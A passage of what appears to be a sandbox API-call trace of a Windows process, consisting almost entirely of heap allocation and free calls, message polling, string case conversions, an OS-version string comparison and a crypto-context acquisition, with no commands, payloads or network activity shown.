(lpLibFileName="Advapi32.dll") returned 0x74d40000 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.421] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.422] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0196.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.422] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0196.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0196.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.422] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.422] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.423] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.423] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.423] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.424] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.429] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.430] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.430] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0196.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.431] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.432] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.432] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.432] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.433] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 